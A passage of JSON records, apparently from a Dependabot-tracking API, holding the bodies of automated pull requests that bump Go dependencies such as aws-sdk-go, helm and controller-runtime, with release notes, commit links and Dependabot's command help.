href=\"https://github.com/aws/aws-sdk-go-v2/commit/9225797aa8ce8661d61f4628973aface4e01c922\"\u003e\u003ccode\u003e9225797\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7b6f675adb365c7b069aaf2a8e81c4b8f8a5d08e\"\u003e\u003ccode\u003e7b6f675\u003c/code\u003e\u003c/a\u003e Bump smithy-go to 1.25 (again) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3390\"\u003e#3390\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c8b6a97220901cccfd8a06f6f25aef65a967384c\"\u003e\u003ccode\u003ec8b6a97\u003c/code\u003e\u003c/a\u003e Release 2026-04-16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4a05c2ba948715d305aff4519154abe2c4799246\"\u003e\u003ccode\u003e4a05c2b\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6cd4cc9201382be2638c8b4951b5d92de73c1161\"\u003e\u003ccode\u003e6cd4cc9\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3153bed494fb9e426640b30c7b91be0510b20362\"\u003e\u003ccode\u003e3153bed\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fe3cef6cc115a2915f5410c739dc73d51553d709\"\u003e\u003ccode\u003efe3cef6\u003c/code\u003e\u003c/a\u003e Make AccountIDEndpointRouting aware of bdd endpoints (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3387\"\u003e#3387\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.40.1...v1.41.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/sts` from 1.41.10 to 1.42.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ee5e3f05637540596cc7aab1359742000a8d533a\"\u003e\u003ccode\u003eee5e3f0\u003c/code\u003e\u003c/a\u003e Release 2023-11-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b65c226f47aa1f837699664bdc65c3c3e3611765\"\u003e\u003ccode\u003eb65c226\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7a194b9b0344774a5af100d11ea2066c5b0cf234\"\u003e\u003ccode\u003e7a194b9\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0cb924a0007bc681d12f382a604368e0660827ee\"\u003e\u003ccode\u003e0cb924a\u003c/code\u003e\u003c/a\u003e Add support for configured endpoints. (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2328\"\u003e#2328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/61039fea9cc9e080c53382850c87685b5406fd68\"\u003e\u003ccode\u003e61039fe\u003c/code\u003e\u003c/a\u003e Release 2023-10-31\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/797e0560769725635218fc30a2554c1bbaccc01b\"\u003e\u003ccode\u003e797e056\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/822585d3f621a7c5844584d8e471c32f852702aa\"\u003e\u003ccode\u003e822585d\u003c/code\u003e\u003c/a\u003e Update SDK's smithy-go dependency to v1.16.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/abf753db747dd256f3ee69712a19d1d3dc681f23\"\u003e\u003ccode\u003eabf753d\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/99861c071109ce5ee4f1cb3b72ead2062b3bd86c\"\u003e\u003ccode\u003e99861c0\u003c/code\u003e\u003c/a\u003e lang: bump minimum go version to 1.19 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2338\"\u003e#2338\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2ac0a53ac45acaadc4526fd25b643dc46032b02a\"\u003e\u003ccode\u003e2ac0a53\u003c/code\u003e\u003c/a\u003e Release 2023-10-30\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ecs/v1.41.10...service/s3/v1.42.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\n\n\n\u003c/details\u003e","html_url":"https://github.com/grafana/grafana/pull/123377","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/grafana%2Fgrafana/issues/123377","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/123377/packages"}},{"old_version":"1.50.36","new_version":"1.55.8","update_type":"minor","path":null,"pr_created_at":"2026-04-13T20:00:29.000Z","version_change":"1.50.36 → 1.55.8","issue":{"uuid":"4257538666","node_id":"PR_kwDOFyRkIM7SGbzv","number":10744,"state":"open","title":"Bump the all-go-mod-patch-and-minor group across 2 directories with 41 updates","user":"dependabot[bot]","labels":["ok-to-test","size/XXL","dependabot"],"assignees":[],"locked":false,"comments_count":3,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-04-13T20:00:29.000Z","updated_at":"2026-04-20T21:17:33.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"all-go-mod-patch-and-minor","update_count":41,"packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.50.36","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2","old_version":"1.30.1","new_version":"1.41.5","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/config","old_version":"1.26.6","new_version":"1.32.14","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ec2","old_version":"1.167.1","new_version":"1.297.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ecr","old_version":"1.27.4","new_version":"1.57.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/eks-anywhere-packages","old_version":"0.4.5","new_version":"0.4.15","repository_url":"https://github.com/aws/eks-anywhere-packages"},{"name":"github.com/aws/etcdadm-bootstrap-provider","old_version":"1.0.17","new_version":"1.0.19","repository_url":"https://github.com/aws/etcdadm-bootstrap-provider"},{"name":"github.com/aws/etcdadm-controller","old_version":"1.0.25","new_version":"1.0.27","repository_url":"https://github.com/aws/etcdadm-controller"},{"name":"github.com/bmc-toolbox/bmclib/v2","old_version":"2.1.1-0.20231206130132-1063371b9ed6","new_version":"2.3.5","repository_url":"https://github.com/bmc-toolbox/bmclib"},{"name":"github.com/docker/cli","old_version":"29.2.0+incompatible","new_version":"29.4.0+incompatible","repository_url":"https://github.com/docker/cli"},{"name":"github.com/go-git/go-git/v5","old_version":"5.17.1","new_version":"5.17.2","repository_url":"https://github.com/go-git/go-git"},{"name":"github.com/go-jose/go-jose/v3","old_version":"3.0.4","new_version":"3.0.5","repository_url":"https://github.com/go-jose/go-jose"},{"name":"github.com/nutanix-cloud-native/prism-go-client","old_version":"0.3.4","new_version":"0.7.1","repository_url":"https://github.com/nutanix-cloud-native/prism-go-client"},{"name":"github.com/onsi/gomega","old_version":"1.38.2","new_version":"1.39.1","repository_url":"https://github.com/onsi/gomega"},{"name":"github.com/spf13/cobra","old_version":"1.10.1","new_version":"1.10.2","repository_url":"https://github.com/spf13/cobra"},{"name":"github.com/vmware/govmomi","old_version":"0.51.0","new_version":"0.53.0","repository_url":"https://github.com/vmware/govmomi"},{"name":"golang.org/x/oauth2","old_version":"0.33.0","new_version":"0.36.0","repository_url":"https://github.com/golang/oauth2"},{"name":"gopkg.in/ini.v1","old_version":"1.67.0","new_version":"1.67.1"},{"name":"helm.sh/helm/v3","old_version":"3.18.5","new_version":"3.20.2","repository_url":"https://github.com/helm/helm"},{"name":"sigs.k8s.io/cluster-api/test","old_version":"1.11.1","new_version":"1.11.8","repository_url":"https://github.com/kubernetes-sigs/cluster-api"},{"name":"sigs.k8s.io/controller-runtime","old_version":"0.22.4","new_version":"0.22.5","repository_url":"https://github.com/kubernetes-sigs/controller-runtime"},{"name":"github.com/golang-jwt/jwt/v5","old_version":"5.2.2","new_version":"5.3.1","repository_url":"https://github.com/golang-jwt/jwt"},{"name":"github.com/itchyny/gojq","old_version":"0.12.17","new_version":"0.12.19","repository_url":"https://github.com/itchyny/gojq"},{"name":"k8s.io/kubelet","old_version":"0.29.5","new_version":"0.29.15","repository_url":"https://github.com/kubernetes/kubelet"}],"path":null,"ecosystem":"go"},"body":"Bumps the all-go-mod-patch-and-minor group with 24 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.50.36` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.30.1` | `1.41.5` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.14` |\n| [github.com/aws/aws-sdk-go-v2/service/ec2](https://github.com/aws/aws-sdk-go-v2) | `1.167.1` | `1.297.0` |\n| [github.com/aws/aws-sdk-go-v2/service/ecr](https://github.com/aws/aws-sdk-go-v2) | `1.27.4` | `1.57.0` |\n| [github.com/aws/eks-anywhere-packages](https://github.com/aws/eks-anywhere-packages) | `0.4.5` | `0.4.15` |\n| [github.com/aws/etcdadm-bootstrap-provider](https://github.com/aws/etcdadm-bootstrap-provider) | `1.0.17` | `1.0.19` |\n| [github.com/aws/etcdadm-controller](https://github.com/aws/etcdadm-controller) | `1.0.25` | `1.0.27` |\n| [github.com/bmc-toolbox/bmclib/v2](https://github.com/bmc-toolbox/bmclib) | `2.1.1-0.20231206130132-1063371b9ed6` | `2.3.5` |\n| [github.com/docker/cli](https://github.com/docker/cli) | `29.2.0+incompatible` | `29.4.0+incompatible` |\n| [github.com/go-git/go-git/v5](https://github.com/go-git/go-git) | `5.17.1` | `5.17.2` |\n| [github.com/go-jose/go-jose/v3](https://github.com/go-jose/go-jose) | `3.0.4` | `3.0.5` |\n| [github.com/nutanix-cloud-native/prism-go-client](https://github.com/nutanix-cloud-native/prism-go-client) | `0.3.4` | `0.7.1` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.39.1` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [github.com/vmware/govmomi](https://github.com/vmware/govmomi) | `0.51.0` | `0.53.0` |\n| [golang.org/x/oauth2](https://github.com/golang/oauth2) | `0.33.0` | `0.36.0` |\n| gopkg.in/ini.v1 | `1.67.0` | `1.67.1` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.20.2` |\n| [sigs.k8s.io/cluster-api/test](https://github.com/kubernetes-sigs/cluster-api) | `1.11.1` | `1.11.8` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/golang-jwt/jwt/v5](https://github.com/golang-jwt/jwt) | `5.2.2` | `5.3.1` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [k8s.io/kubelet](https://github.com/kubernetes/kubelet) | `0.29.5` | `0.29.15` |\n\nBumps the all-go-mod-patch-and-minor group with 10 updates in the /release/cli directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.54.12` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.32.7` | `1.41.5` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.14` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.39.1` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.20.2` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [github.com/aws/aws-sdk-go-v2/service/kms](https://github.com/aws/aws-sdk-go-v2) | `1.37.9` | `1.50.4` |\n| [github.com/fsouza/go-dockerclient](https://github.com/fsouza/go-dockerclient) | `1.12.2-0.20250814055408-c31f6141d29b` | `1.13.1` |\n\n\nUpdates `github.com/aws/aws-sdk-go` from 1.50.36 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.6 (2025-01-15)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix broken printf for go1.24\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.5 (2024-07-30)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/appstream\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eAdded support for Red Hat Enterprise Linux 8 on Amazon AppStream 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/autoscaling\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eIncrease the length limit for VPCZoneIdentifier from 2047 to 5000\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/codepipeline\u003c/code\u003e: Updates service API, documentation, and paginators\n\u003cul\u003e\n\u003cli\u003eAWS CodePipeline V2 type pipelines now support stage level conditions to enable development teams to safely release changes that meet quality and compliance requirements.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eDoc only update for changes to deletion API.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticloadbalancing\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/eventbridge\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/logs\u003c/code\u003e: Updates service API\n\u003cul\u003e\n\u003cli\u003eAdd v2 smoke tests and smithy smokeTests trait for SDK testing.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/models.lex.v2\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/rolesanywhere\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/tnb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/workspaces\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRemoving multi-session as it isn't supported for pools\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.4 (2024-07-29)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRenaming full service name as it appears in developer documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/memorydb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.50.36...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2` from 1.30.1 to 1.41.5\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/90650dd22735ab68f6089ae5c39b6614286ae9ec\"\u003e\u003ccode\u003e90650dd\u003c/code\u003e\u003c/a\u003e Release 2026-03-26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/dd88818bee7d632a8b9da6e2c78ef92e23c94c62\"\u003e\u003ccode\u003edd88818\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b662c50138bd393927871b46e84ee3483377f5be\"\u003e\u003ccode\u003eb662c50\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/500a9cb3522a0e71d798d7079ff5856b23c2cac1\"\u003e\u003ccode\u003e500a9cb\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6221102f763bd65d7e403fa62c3a1e3d39e24dc6\"\u003e\u003ccode\u003e6221102\u003c/code\u003e\u003c/a\u003e fix stale skew and delayed skew healing (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3359\"\u003e#3359\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0a39373433a121800bc68efa743a7486eb07aa3f\"\u003e\u003ccode\u003e0a39373\u003c/code\u003e\u003c/a\u003e fix order of generated event header handlers (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3361\"\u003e#3361\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/098f3898271e2eaaf8a92e38d1d928fb018805a6\"\u003e\u003ccode\u003e098f389\u003c/code\u003e\u003c/a\u003e Only generate resolveAccountID when it's required (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3360\"\u003e#3360\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6ebab66428e97db0ee252fea042d56b1313cb9f6\"\u003e\u003ccode\u003e6ebab66\u003c/code\u003e\u003c/a\u003e Release 2026-03-25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b2ec3beebb986a5e74e50d0c105119d84e1e934e\"\u003e\u003ccode\u003eb2ec3be\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/abc126f6b35bfe2f77e2505f6d04f8ceced971ee\"\u003e\u003ccode\u003eabc126f\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.30.1...v1.41.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/config` from 1.26.6 to 1.32.14\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d15107640a5073c5ce53dc395210858e316d5e82\"\u003e\u003ccode\u003ed151076\u003c/code\u003e\u003c/a\u003e Release 2026-04-02\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e33c9a9f67577e2dd5fcd3b15b9a8a2e83683f53\"\u003e\u003ccode\u003ee33c9a9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e06655901c88ef90432f41a7b9c92b33b4537c75\"\u003e\u003ccode\u003ee066559\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a635ee4303d8cac381be8788519a1a8bba5ccf12\"\u003e\u003ccode\u003ea635ee4\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9074b3ddace9c195f00993c8ae509bc8977a6c4c\"\u003e\u003ccode\u003e9074b3d\u003c/code\u003e\u003c/a\u003e Release 2026-04-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f6ad4c082d3a1995b9add26af4eb7553b13df252\"\u003e\u003ccode\u003ef6ad4c0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/12a971a61d5226cd72102c66b188ae4968cb9b81\"\u003e\u003ccode\u003e12a971a\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8bd8eee331c2fa1553e57d18d5dbbf1dc83820fc\"\u003e\u003ccode\u003e8bd8eee\u003c/code\u003e\u003c/a\u003e chore: add additional text to CONTRIBUTING.md (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3372\"\u003e#3372\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e4deb657ddb9c5d8ac36c335391aafb19034e9de\"\u003e\u003ccode\u003ee4deb65\u003c/code\u003e\u003c/a\u003e Release 2026-03-31\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1f758f207351302f9f4e1a2aa4c255a75d81446b\"\u003e\u003ccode\u003e1f758f2\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.26.6...config/v1.32.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/credentials` from 1.17.7 to 1.19.14\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca 